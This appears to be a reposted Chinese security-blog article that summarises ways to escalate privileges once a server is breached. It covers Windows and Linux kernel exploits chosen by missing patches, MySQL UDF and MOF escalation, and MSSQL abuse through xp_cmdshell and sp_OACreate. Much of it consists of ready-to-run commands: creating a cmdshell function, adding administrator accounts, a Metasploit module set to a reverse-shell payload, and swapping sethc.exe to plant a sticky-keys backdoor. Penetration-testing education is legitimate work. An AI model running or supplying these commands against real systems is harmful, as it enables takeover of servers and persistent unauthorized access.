渗透测试——提权方式总结

admin
admin
admin
100797
文章
86
评论
2021年10月11日01:38:01评论179 views字数 6639阅读22分7秒阅读模式


渗透测试——提权方式总结

一、 什么是提权

渗透测试——提权方式总结


渗透测试——提权方式总结

提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。

Windows:User >> System

Linux:User >> Root

渗透测试——提权方式总结
渗透测试——提权方式总结




渗透测试——提权方式总结

二、怎样进行提权(提权的方式有哪些)

渗透测试——提权方式总结


1.、系统漏洞提权(Linux、Windows)2、数据库提权3、系统配置错误提权4、权限继承类提权5、第三方软件/服务提权6、WebServer漏洞提权


1、系统漏洞提权

渗透测试——提权方式总结


系统漏洞提权一般就是利用系统自身缺陷,用来提升权限。为了使用方便,windows和linux系统均有提权用的可执行文件。


Windows的提权exp一般格式为MS08067.exeLinux的提权exp一般格式为2.6.18-194或2.6.18.c



渗透测试——提权方式总结

(1)Windows提权

渗透测试——提权方式总结



1.1> 漏洞编号命名格式


Windows系统漏洞编号命名格式为:MS08067


其中:MS是Micosoft的缩写,固定格式;08 表示年份,即2008年发布的漏洞;067 表示顺序,即当年度发布的第67个漏洞。


1.2> 使用exp提权


在日常渗透测试过程中,我们常常会先是拿到webshell再进行提权。所以提权脚本也常常会被在webshell中运行使用。


那么我们如何知道使用哪个exp来提权呢?


我们可以使用systeminfo命令或者查看补丁目录,查看补丁记录,来判断有哪个补丁没打,然后使用相对应的exp进行提权。


KB2645640   MS12-009KB2641653   MS12-018KB952004     MS09-012 Pr.exeKB956572     MS09-012 巴西烤肉KB971657     MS09-041KB2620712   MS11-097KB2393802   MS11-011 ms11011.exeKB942831     MS08-005KB2503665   MS11-046 ms11046.exeKB2592799   MS11-080 ms11080.exe


 


渗透测试——提权方式总结

(2)Linux系统提权

渗透测试——提权方式总结



Linux系统漏洞的exp一般按照内核版本来命名:2.6.18-194或2.6.18.c


形如2.6.18-194,可以直接执行;形如2.6.18.c,需要编译后运行,提权。当然也有少部分exp是按照发行版版本命名。


使用exp


一般情况下linux的本地提权要用nc反弹出来,因为Linux下提升权限后得到的是交互式shell,需反弹才能进行下一步命令的执行。

我们可以使用uname -a命令或者cat /proc/version,来判断系统的内核情况等等,然后使用相对应的exp进行提权。

注:


提权过程中需要为你的提权exp赋权,chmod。

linux服务器很多情况下管理员会设置目录权限,我们无法修改,但是一般/tmp/目录不会被设置权限,这和windows下的tmp和回收站是一个道理,所以我们可以将exp存放到/tmp目录下。


2、数据库提权

渗透测试——提权方式总结


数据库提权是指:通过执行数据库语句、数据库函数等方式提升服务器用户的权限。


首先我们要先有能力登入数据库,所以通常我们拿到webshell之后要去网站目录去找数据库连接文件,常在形如xxx.conf或conf.xxx文件中。



渗透测试——提权方式总结

(1)MySQL数据库提权

渗透测试——提权方式总结



MySQL数据库一般是使用udf(用户自定义函数)提权或mof(托管对象格式)提权。


1.1> udf提权(用户自定义函数)


条件:

1、系统版本(Windows2000,XP,Win2003);

2、拥有MYSQL的某个账号,且该账号具有对msql的insert与delete权限;

3、具有root账号密码。


使用方法:

1、获取当前mysql的一个数据库连接信息,通常包含地址、端口、账号、密码、库名等五个信息。

2、把udf专用的webshell传到服务器上,访问并进行数据库连接。

3、连接成功后,导出DLL文件。


注:


Mysql<5.0,导出路径随意;

5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;

mysql>5.1,需要导出dll到插件路径,例如:D:Program FilesMySQLMySQL Server 5.1.3libplugin

若mysql>=5.0,语句中的DLL不允许带全路径,如果在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则将会看到”Can’t open shared library“错误。

如果提示“Function ‘cmdshell’ already exists”,则输入下列语句可以解决:drop function cmdshell;


4、使用SQL语句创建自定义函数。语法如下:


Create Function 函数名 returns string soname '导出的DLL路径';

eg: Create Function cmdshell returns string soname 'udf.dll';


功能函数说明:

cmdshell 执行cmd;downloader 下载者,到网上下载指定文件并保存到指定目录;open3389 通用开3389终端服务,可指定端口(不改端口无需重启);backshell 反弹Shell;ProcessView 枚举系统进程;KillProcess 终止指定进程;regread 读注册表;regwrite 写注册表;shut 关机,注销,重启;about 说明与帮助函数;

5、创建函数成功后,就可以通过sql语句调用它了。


语法如下:select 创建的函数名 ('参数列表');eg: select cmdshell("net user nsfocus Nsf0cus /add");# 创建一个用户nsfocus,密码为Nsf0cus


6、函数使用完后,我们需要把之前生成的DLL和创建的函数删除掉,但要注意次序,必须先删除函数再删除DLL。


删除函数的语法如下:drop function 创建的函数名;eg: drop function cmdshell;


整体思路:


导出C:windowsudf.dllCreate Function cmdshell returns string soname 'udf.dll';select cmdshell('whoami')drop function cmdshell1.2>  Mof提权(托管对象格式)


提权c:/windows/system32/wbem/mof/use exploit/windows/mysql/mysql_mofset password xxxset username xxxset rhost xxxset rport xxxset payload windows/shell_reverse_tcpset lhost xxxset lport xxxexploit




渗透测试——提权方式总结

(2)Mssql数据库提权

渗透测试——提权方式总结



Mssql数据库提权总结

渗透测试——提权方式总结


在SA权限下

存在xp_cmdshell使用xp_cmdshell执行命令添加用户,当出现错误可以恢复和开启xp_cmdshell无法使用时使用sp_OACreate执行命令,同样当出现错误可以恢复和开启当执行命令无法使用时可以用沙盒提权 (使用xp_regwriteopenrowset)当只有xp_regwrite可用时可以劫持粘滞键(sethc.exe)使用xp_regwrite修改注册表


DBA权限下

备份到网站目录通过备份文件到启动项提权


2.1> SA口令获取方法


2.1.1 Webshell或源码获取


一般在网站的配置文件中有存放明文账号密码,常用配置文件名如:


conn.aspxconfig.aspxconfig.phpweb.config.........


一般格式如:


server=localhost;UID=sa;PWD=shadowflow


2.1.2源代码泄露


网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn、.git、.bak),以及运维人员打包源代码到网站服务器(www.rar等)。


2.1.3嗅探


在局域网中使用cain等工具进行arp嗅探的时候可以抓取到1433端口的数据库明文登录密码


2.1.4口令暴力破解


利用mssql暴力破解工具对mssql进行暴力破解,一旦成功将获得sa相应权限


2.2> 常用SQL Server提权语句


查看数据库版本:select @@version查看数据库系统参数:exec master..xp_msver;查看用户所属角色信息:sp_helpsrvrolemember查看当前数据库:select db_name()显示机器上的驱动器:xp_availablemedia
查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin') #判断是否为sa权限
类似serveradmin,setupadmin,securityadmin,diskadmin,bulkadmin
select IS_MEMBER('db_owner') #判断是否为dbo权限
添加用户
exec master.dbo.sp_addlogin test,password #添加用户
exec master.dbo.sp_addsrvrolemember test,sysadmin #加权限
启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'

检查功能

SELECT count(*)FROM master.dbo.sysobjects WHERE name='xp_cmdshell'

xp_cmdshell, xpregread,sp_makewebtask,xp_subdirs,xp_dirtree, sp_addextendedproc


xp_cmdshell


1、开启xp_cmdshell存储过程


exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;RECONFIGURE;


2、关闭xp_cmdshell存储过程


exec sp_configure 'show advanced options', 1, RECONFIGURE;exec sp_configure 'xp_cmdshell',0;RECONFIGURE;


3、xp_cmdshell执行命令


exec master..xp_cmdshell 'ver'exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'


4、恢复xp_cmdshell


exec sp_dropextendedproc 'xp_cmdshell'dbcc addextendedproc ("xp_cmdshell","xplog70.dll) OR dbcc addextendedproc ("xp_cmdshell","d:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll");EXEC sp_configure 'show advanced options', 0 --


sp_OACreate


1、开启sp_OACreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;


2、关闭sp_OACreate

exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;


3、禁用advanced options

EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;


4、sp_OACreate执行命令


DECLARE @js intEXEC sp_OACreate 'ScriptControl',@js OUTEXEC sp_OASetProperty @js,'Language','JavaScript'ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'


5、sp_OACreate移动文件

declare @aa intexec sp_oacreate 'scripting.filesystemobject' @aa outexec sp_oamethod @aa, 'moveFile',null,'c:tempipmi.log','c:tempipmi1.log';

6、sp_OACreate复制文件


declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'c:windowsexplorer.exe','c:windowssystem32sethc.exe';


7、sp_OACreate删除文件


DECLARE @Result intDECLARE @FSO_Token intEXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUTEXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:Documents and SettingsAll Users [开始] 菜单程序启动user.bat'

EXEC @Result = sp_OADestrop @FSO_Token


8、wscript.shell执行命令


9、Shell.Application执行命令


10、sp_oacreate 替换粘贴键


沙盒执行命令openrowset开启openrowset关闭沙盒执行命令注册表篡改注册表劫持粘贴键


3、系统配置不当提权

渗透测试——提权方式总结


利用配置不当提权


    前提:已经成功渗透进目标系统;

    相比利用漏洞提权,是更常用的方法;

    在大部分企业中,会将系统的漏洞即时进行补丁更新,难以通过系统自身我的漏洞进行入侵;

    可以查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式提权;

    可以查找NTFS权限允许users修改删除的应用,利用配置不当进行提权;

    代码中是否有过滤参数的操作等都可以加以利用,进行提取;


4、权限继承类提权

渗透测试——提权方式总结


开机启动项提权?

windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。



5、第三方软件/服务提权

渗透测试——提权方式总结

类型较多,选择参考

https://www.jianshu.com/p/7115b54e6da9

https://blog.csdn.net/fuckcat_2333/article/details/52164630



6、WebServer漏洞提权

渗透测试——提权方式总结

参考

暂时无法播放,可回源网站播放

————————————————



参考引用链接:https://blog.csdn.net/qq_38684504/article/details/91359951(作者:橘子女侠)

往期推荐


【内网渗透系列】|14-内网穿透之多层代理

【内网渗透系列】|13-哈希传递攻击利用(Pass The Hash)

在校生,渗透接近0基础,该怎么开始学习,毕业该怎么办?(非广告,经验贴)

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

知识星球【Hacking藏经阁】-10大类渗透体系课程,让你告别脚本小子

成为黑客学习路线-基础捞、高楼起(文末附视频教程资料)

从知识星球谈副业、经营自己,如何让你远离35岁中年危机



原文始发于微信公众号(Hacking黑白红):渗透测试——提权方式总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月11日01:38:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试——提权方式总结http://cn-sec.com/archives/576944.html

发表评论

匿名网友 填写信息